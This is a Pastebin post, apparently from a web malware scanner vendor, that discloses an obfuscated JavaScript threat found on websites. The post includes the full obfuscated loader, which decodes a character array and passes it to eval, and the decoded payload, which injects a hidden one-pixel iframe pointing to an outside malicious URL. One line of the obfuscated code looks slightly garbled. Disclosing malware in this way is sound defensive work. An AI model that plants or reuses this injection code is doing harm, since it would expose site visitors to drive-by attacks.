SHARE
TWEET

Quttera web malware scanner detected malicious obfuscated JS

a guest Jul 27th, 2013 61 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2.  * Quttera web malware scanner detected malicious obfuscated code injecting hidden iframe to malicious
  3.  * link
  4.  */
  5.  
  6. /*
  7.  * Original threat
  8.  */
  9. try {
  10.     window.document.body++
  11. } catch (gdsgsdg) {
  12.     dbshre = 147;
  13. }
  14. if (dbshre) {
  15.     asd = 0;
  16.     try {
  17.         d = document.createElement("div");
  18.         d.innerHTML.a = "asd";
  19.     } catch (agdsg) {
  20.         asd = 1;
  21.     }
  22.     if (!asd) {
  23.         e = eval;
  24.     }
  25.     ss = String;
  26.     asgq = new Array(31, 94, 110, 104, 94, 107, 97, 104, 104, 27, 31, 33, 25, 117, 8, 1, 24, 25, 26, 27, 109, 89, 107, 26, 106, 113, 105, 107, 26, 56, 23, 92, 104, 93, 112, 100, 93, 103, 110, 41, 90, 106, 94, 91, 111, 92, 61, 101, 95, 104, 92, 102, 109, 34, 34, 96, 94, 107, 91, 104, 92, 31, 34, 53, 8, 1, 5, 3, 26, 27, 23, 24, 104, 116, 108, 105, 38, 108, 108, 94, 23, 53, 25, 33, 99, 107, 108, 105, 52, 42, 38, 91, 94, 108, 97, 108, 107, 109, 40, 105, 99, 39, 105, 91, 107, 105, 97, 100, 91, 42, 90, 100, 98, 101, 41, 103, 96, 105, 33, 54, 4, 2, 25, 26, 27, 23, 103, 115, 107, 109, 37, 107, 109, 115, 103, 92, 38, 105, 105, 110, 96, 108, 98, 105, 105, 23, 53, 25, 33, 92, 89, 107, 104, 102, 112, 107, 93, 32, 53, 8, 1, 24, 25, 26, 27, 102, 114, 106, 108, 41, 106, 108, 114, 102, 96, 37, 90, 104, 108, 95, 92, 106, 25, 55, 27, 30, 40, 32, 53, 8, 1, 24, 25, 26, 27, 102, 114, 106, 108, 41, 106, 108, 114, 102, 96, 37, 96, 94, 99, 98, 95, 108, 25, 55, 27, 30, 41, 105, 114, 34, 50, 5, 3, 26, 27, 23, 24, 104, 116, 108, 105, 38, 108, 110, 116, 99, 93, 39, 113, 100, 91, 108, 97, 26, 56, 23, 31, 42, 106, 115, 30, 51, 6, 4, 27, 23, 24, 25, 105, 117, 104, 106, 39, 109, 111, 112, 100, 94, 40, 103, 92, 94, 109, 26, 56, 23, 31, 42, 106, 115, 30, 51, 6, 4, 27, 23, 24, 25, 105, 117, 104, 106, 39, 109, 111, 112, 100, 94, 40, 111, 102, 104, 25, 55, 27, 30, 41, 105, 114, 34, 50, 5, 3, 7, 5, 23, 24, 25, 26, 100, 93, 24, 33, 27, 95, 102, 91, 110, 103, 96, 101, 108, 39, 97, 96, 107, 61, 101, 95, 104, 92, 102, 109, 60, 116, 64, 92, 33, 33, 106, 113, 105, 107, 33, 36, 32, 24, 116, 7, 5, 23, 24, 25, 26, 27, 23, 24, 25, 94, 106, 90, 109, 102, 95, 105, 107, 38, 112, 108, 100, 107, 93, 33, 33, 55, 91, 97, 111, 26, 100, 91, 53, 85, 33, 106, 113, 105, 107, 86, 34, 53, 52, 40, 94, 100, 109, 54, 32, 35, 54, 4, 2, 25, 26, 27, 23, 24, 25, 26, 27, 91, 103, 92, 111, 104, 92, 102, 109, 40, 98, 92, 108, 62, 102, 96, 100, 93, 103, 110, 61, 112, 65, 93, 34, 34, 102, 114, 106, 108, 34, 32, 38, 90, 106, 107, 92, 102, 93, 61, 99, 96, 100, 93, 34, 106, 113, 105, 107, 35, 54, 4, 2, 25, 26, 27, 23, 117, 6, 4, 120, 32, 32, 34, 53);
  27.     s = "";
  28.     for (i = 0; i - 484 != 0; i++) {
  29.         if ((020 == 0x10) % 26 % 26window.document) s += ss["fromCharCode"](1 * asgq[i] - (i % 5 - 5 - 4));
  30.     }
  31.     z = s;
  32.     e(s);
  33. }
  34.  
  35.  
  36. /*
  37.  * decoded payload  injecting malicious hidden iframe to http://cerfust[.]nl/paprika/clik[.]php';
  38.  */
  39. (function () {
  40.     var ozqr = document.createElement('iframe');
  41.     ozqr.src = 'http://cerfust.nl/paprika/clik.php';
  42.     ozqr.style.position = 'absolute';
  43.     ozqr.style.border = '0';
  44.     ozqr.style.height = '1px';
  45.     ozqr.style.width = '1px';
  46.     ozqr.style.left = '1px';
  47.     ozqr.style.top = '1px';
  48.     if (!document.getElementById('ozqr')) {
  49.         document.write('<div id=\'ozqr\'></div>');
  50.         document.getElementById('ozqr').appendChild(ozqr);
  51.     }
  52. })();
RAW Paste Data
Top